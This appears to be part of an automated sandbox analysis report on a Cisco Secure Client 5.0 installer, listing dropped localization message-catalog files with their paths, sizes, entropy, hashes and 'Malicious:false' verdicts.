                                                                                                                                      SHA-256:3B0D7490F9015F37EBA158AFE26F9C56A9D35624564CD295EC596D9A6B52B340
                                                                                                                                      SHA-512:448D36E38E516A33CD5A9AB50B3DEE45B1EED40E05AC9B13B3041CC4523EB8E42EE3A88355FA27A1652D0B8D9C58DECD90FF88EEE2765D42584FD94142ACDA8B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\l10n\ko-kr\LC_MESSAGES\is-CITOI.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):357929
                                                                                                                                      Entropy (8bit):6.014691052026819
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:LjH3U1ogM5PcD4sAVoVBKIuDVKuAYjG+chxEb1XVnhkv3zdYGLzOJ7CiqP0aCKo:LjH3UKwSOVBKfKh+wfBY6iJ7CLc5Ko
                                                                                                                                      MD5:B0DAAEF17D63E6DB7225FC65A5BEED25
                                                                                                                                      SHA1:CD73B824DDC96B0BCB4BA3E4BF389BF8153B2440
                                                                                                                                      SHA-256:3B0D7490F9015F37EBA158AFE26F9C56A9D35624564CD295EC596D9A6B52B340
                                                                                                                                      SHA-512:448D36E38E516A33CD5A9AB50B3DEE45B1EED40E05AC9B13B3041CC4523EB8E42EE3A88355FA27A1652D0B8D9C58DECD90FF88EEE2765D42584FD94142ACDA8B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\l10n\nl-nl\LC_MESSAGES\SecureClientDefault.mo (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):347088
                                                                                                                                      Entropy (8bit):5.137429334753401
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:LjH3U1ogMlckwL1nSoVBKIuDVKuAYjG+chxEb1XVnhMmpLSr1LgO0+1zfykgRhr8:LjH3UKtcpnnVBKfKh+jFP0Z
                                                                                                                                      MD5:F9ABBCA86A0DAB6C01915CB745CDE31A
                                                                                                                                      SHA1:49FF0DB4BDCF002AC981AADEAF839FB9F210F28F
                                                                                                                                      SHA-256:281772D7111DBEE29EE3728CDC56634B4D75AC16E681D66B008EEFECAF6277B3
                                                                                                                                      SHA-512:76E4FB468C76ADA1B355F7786CF9EE57DCEAB3294E57310B4BA8B9BB84A6EFB4F3BDFB31B4541DBC461164E521496B0287BE0ACC09732E3089B49E491D130FAB
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\l10n\nl-nl\LC_MESSAGES\is-820T8.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):347088
                                                                                                                                      Entropy (8bit):5.137429334753401
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:LjH3U1ogMlckwL1nSoVBKIuDVKuAYjG+chxEb1XVnhMmpLSr1LgO0+1zfykgRhr8:LjH3UKtcpnnVBKfKh+jFP0Z
                                                                                                                                      MD5:F9ABBCA86A0DAB6C01915CB745CDE31A
                                                                                                                                      SHA1:49FF0DB4BDCF002AC981AADEAF839FB9F210F28F
                                                                                                                                      SHA-256:281772D7111DBEE29EE3728CDC56634B4D75AC16E681D66B008EEFECAF6277B3
                                                                                                                                      SHA-512:76E4FB468C76ADA1B355F7786CF9EE57DCEAB3294E57310B4BA8B9BB84A6EFB4F3BDFB31B4541DBC461164E521496B0287BE0ACC09732E3089B49E491D130FAB
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\l10n\pl-pl\LC_MESSAGES\SecureClientDefault.mo (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):352370
                                                                                                                                      Entropy (8bit):5.387002164805478
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKisfdVbVBKfKh+tps+fpWQUbSKN/dTkL4ecW:L7h/VojUbS
                                                                                                                                      MD5:40675B2B9871F33C2739B9636A54EE25
                                                                                                                                      SHA1:9E16B111B97E810EB5E32FF935649DD5057AFD52
                                                                                                                                      SHA-256:C165FF2D1226D1653E42E133DCD3346B3C239779C4EAFF2FA05D8A8416AABEE1
                                                                                                                                      SHA-512:1C1908139C3A4072431D74360513369CFBDD4F0E9EB839457A3C15622A2C5983278DA2BB883CD159C358C143C17CDDC37C54A92F691E313DDE4DC891AF1D1F99
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\l10n\pl-pl\LC_MESSAGES\is-DDL70.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):352370
                                                                                                                                      Entropy (8bit):5.387002164805478
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKisfdVbVBKfKh+tps+fpWQUbSKN/dTkL4ecW:L7h/VojUbS
                                                                                                                                      MD5:40675B2B9871F33C2739B9636A54EE25
                                                                                                                                      SHA1:9E16B111B97E810EB5E32FF935649DD5057AFD52
                                                                                                                                      SHA-256:C165FF2D1226D1653E42E133DCD3346B3C239779C4EAFF2FA05D8A8416AABEE1
                                                                                                                                      SHA-512:1C1908139C3A4072431D74360513369CFBDD4F0E9EB839457A3C15622A2C5983278DA2BB883CD159C358C143C17CDDC37C54A92F691E313DDE4DC891AF1D1F99
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\l10n\pt-br\LC_MESSAGES\SecureClientDefault.mo (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):347902
                                                                                                                                      Entropy (8bit):5.1986177425205575
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKI0MSKZVBKfKh+Ec3LVWxcdXpnY3eURwoqL:L7haJ6
                                                                                                                                      MD5:B4D5001D372A2A132C4E7D55EAE51207
                                                                                                                                      SHA1:7EF98532BD39FB2A157A84824EE85BE6856BE3E0
                                                                                                                                      SHA-256:74D771DF4E83F0D39244FBA32EC6EC10B455398FC2807AD0019ADE29D175935C
                                                                                                                                      SHA-512:9BAF4D5B332EE1EF8708DE77463D869FB28EB8CD645978E64C8194E40A3C3D681F23313E18654B64EA6C6D1AB075B26628E2B34F2EF608BF1A76CB3427CDFD72
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\l10n\pt-br\LC_MESSAGES\is-F2PIU.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):347902
                                                                                                                                      Entropy (8bit):5.1986177425205575
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKI0MSKZVBKfKh+Ec3LVWxcdXpnY3eURwoqL:L7haJ6
                                                                                                                                      MD5:B4D5001D372A2A132C4E7D55EAE51207
                                                                                                                                      SHA1:7EF98532BD39FB2A157A84824EE85BE6856BE3E0
                                                                                                                                      SHA-256:74D771DF4E83F0D39244FBA32EC6EC10B455398FC2807AD0019ADE29D175935C
                                                                                                                                      SHA-512:9BAF4D5B332EE1EF8708DE77463D869FB28EB8CD645978E64C8194E40A3C3D681F23313E18654B64EA6C6D1AB075B26628E2B34F2EF608BF1A76CB3427CDFD72
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\l10n\ru-ru\LC_MESSAGES\SecureClientDefault.mo (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):467531
                                                                                                                                      Entropy (8bit):5.410391422981112
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:L7hsbx/gNDWv68D6Iv6x5RaGUT0fDmKuajZHd+1wt8:L7a6FmG8
                                                                                                                                      MD5:2C1A2A453E54BFCEE2E97D458843C3BE
                                                                                                                                      SHA1:DF8512B13FB56BB6FCCC5BA01C91D42949875B44
                                                                                                                                      SHA-256:535CD27F4C25F5C007432FFD985C7EA3325659F2D1544264F317E71DD3377E84
                                                                                                                                      SHA-512:2351333B17AB072A2AC9E24D0772775D3519A3163EEB6BAB735845BBC96A51380A181C4E99AD21BECD99F8ED256E845DC421B773F33DD45E260783E90CA66333
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\l10n\ru-ru\LC_MESSAGES\is-7MHMS.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):467531
                                                                                                                                      Entropy (8bit):5.410391422981112
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:L7hsbx/gNDWv68D6Iv6x5RaGUT0fDmKuajZHd+1wt8:L7a6FmG8
                                                                                                                                      MD5:2C1A2A453E54BFCEE2E97D458843C3BE
                                                                                                                                      SHA1:DF8512B13FB56BB6FCCC5BA01C91D42949875B44
                                                                                                                                      SHA-256:535CD27F4C25F5C007432FFD985C7EA3325659F2D1544264F317E71DD3377E84
                                                                                                                                      SHA-512:2351333B17AB072A2AC9E24D0772775D3519A3163EEB6BAB735845BBC96A51380A181C4E99AD21BECD99F8ED256E845DC421B773F33DD45E260783E90CA66333
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\l10n\zh-cn\LC_MESSAGES\SecureClientDefault.mo (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):312691
                                                                                                                                      Entropy (8bit):6.238069670792444
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UK5pl6VBKfKh+spMr61W19INBYB4XGt48xITy:L7h3upMrT19INBYB4XGt48x+y
                                                                                                                                      MD5:05212F97A23F922493CD7F066373D92C
                                                                                                                                      SHA1:F8C2E7CD2949950A1227F02058B82E81876F5C73
                                                                                                                                      SHA-256:66997C101367684439899AC5A287CF194AC7E0BA9CBA753BC620D15B8F98193E
                                                                                                                                      SHA-512:40BB0959EDBD50068288328C8FA268F856BFB70A3737E84E129AE9A1400BF182975D2AD0BEBD5E271A30F7A893BA15CE472A9A80869D58378402CC2D822F97E7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\l10n\zh-cn\LC_MESSAGES\is-2RTJQ.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):312691
                                                                                                                                      Entropy (8bit):6.238069670792444
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UK5pl6VBKfKh+spMr61W19INBYB4XGt48xITy:L7h3upMrT19INBYB4XGt48x+y
                                                                                                                                      MD5:05212F97A23F922493CD7F066373D92C
                                                                                                                                      SHA1:F8C2E7CD2949950A1227F02058B82E81876F5C73
                                                                                                                                      SHA-256:66997C101367684439899AC5A287CF194AC7E0BA9CBA753BC620D15B8F98193E
                                                                                                                                      SHA-512:40BB0959EDBD50068288328C8FA268F856BFB70A3737E84E129AE9A1400BF182975D2AD0BEBD5E271A30F7A893BA15CE472A9A80869D58378402CC2D822F97E7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\l10n\zh-hans\LC_MESSAGES\SecureClientDefault.mo (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):312693
                                                                                                                                      Entropy (8bit):6.237794032422467
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UK4rOZVBKfKh+VpMr61W19INBYB4XGt48xITy:L7h4ppMrT19INBYB4XGt48x+y
                                                                                                                                      MD5:15A97AEAB455C7659F975BF82E1FD0AA
                                                                                                                                      SHA1:811FE4D65EDD072EB5FE66FBBFC49EA7E74A2D33
                                                                                                                                      SHA-256:C71C31ED87B28224850C804EBFA8CBF2B7FAF3AA9AAD453269BCE3BEBC288243
                                                                                                                                      SHA-512:61A3C8E99A1D7F37AE9DF2FA1BE97BDBB4A83A2A676BF1C1E5C7169CFEC44AF13975E4140CA0118586DDBE774C3F1269691D7C4C7BB41A9557A55836BD568A6F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\l10n\zh-hans\LC_MESSAGES\is-RL1IP.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):312693
                                                                                                                                      Entropy (8bit):6.237794032422467
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UK4rOZVBKfKh+VpMr61W19INBYB4XGt48xITy:L7h4ppMrT19INBYB4XGt48x+y
                                                                                                                                      MD5:15A97AEAB455C7659F975BF82E1FD0AA
                                                                                                                                      SHA1:811FE4D65EDD072EB5FE66FBBFC49EA7E74A2D33
                                                                                                                                      SHA-256:C71C31ED87B28224850C804EBFA8CBF2B7FAF3AA9AAD453269BCE3BEBC288243
                                                                                                                                      SHA-512:61A3C8E99A1D7F37AE9DF2FA1BE97BDBB4A83A2A676BF1C1E5C7169CFEC44AF13975E4140CA0118586DDBE774C3F1269691D7C4C7BB41A9557A55836BD568A6F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\l10n\zh-hant\LC_MESSAGES\SecureClientDefault.mo (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):313019
                                                                                                                                      Entropy (8bit):6.234654802477353
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKKGVBKfKh+fOjv7Ln1UFbTr67LaANHgQiAF6OKMNe0akxNDcU:L7hJ1fe0akxNF
                                                                                                                                      MD5:83FB7082E5C1564F62D0CB08A78284D0
                                                                                                                                      SHA1:2EE243786EE95F72C4480BC3B0426B3847F2B235
                                                                                                                                      SHA-256:379DA399CC6B5870BA462F62AE5F7AF544E6DDFF77B5F0BC38E6DC860CAD910C
                                                                                                                                      SHA-512:304C30A39146728C9B48921D4175460D26BD9C564EAA517463E56F78A147EEDF42EBB3FB98E49B60F545E0F667DD96FE4DB017D220B25119FD8A1C7D0BA4DA1A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\l10n\zh-hant\LC_MESSAGES\is-707KS.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):313019
                                                                                                                                      Entropy (8bit):6.234654802477353
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:LjH3UKKGVBKfKh+fOjv7Ln1UFbTr67LaANHgQiAF6OKMNe0akxNDcU:L7hJ1fe0akxNF
                                                                                                                                      MD5:83FB7082E5C1564F62D0CB08A78284D0
                                                                                                                                      SHA1:2EE243786EE95F72C4480BC3B0426B3847F2B235
                                                                                                                                      SHA-256:379DA399CC6B5870BA462F62AE5F7AF544E6DDFF77B5F0BC38E6DC860CAD910C
                                                                                                                                      SHA-512:304C30A39146728C9B48921D4175460D26BD9C564EAA517463E56F78A147EEDF42EBB3FB98E49B60F545E0F667DD96FE4DB017D220B25119FD8A1C7D0BA4DA1A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\l10n\zh-tw\LC_MESSAGES\SecureClientDefault.mo (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):313017
                                                                                                                                      Entropy (8bit):6.23496399047262
                                                                                                                                      Encrypted:false
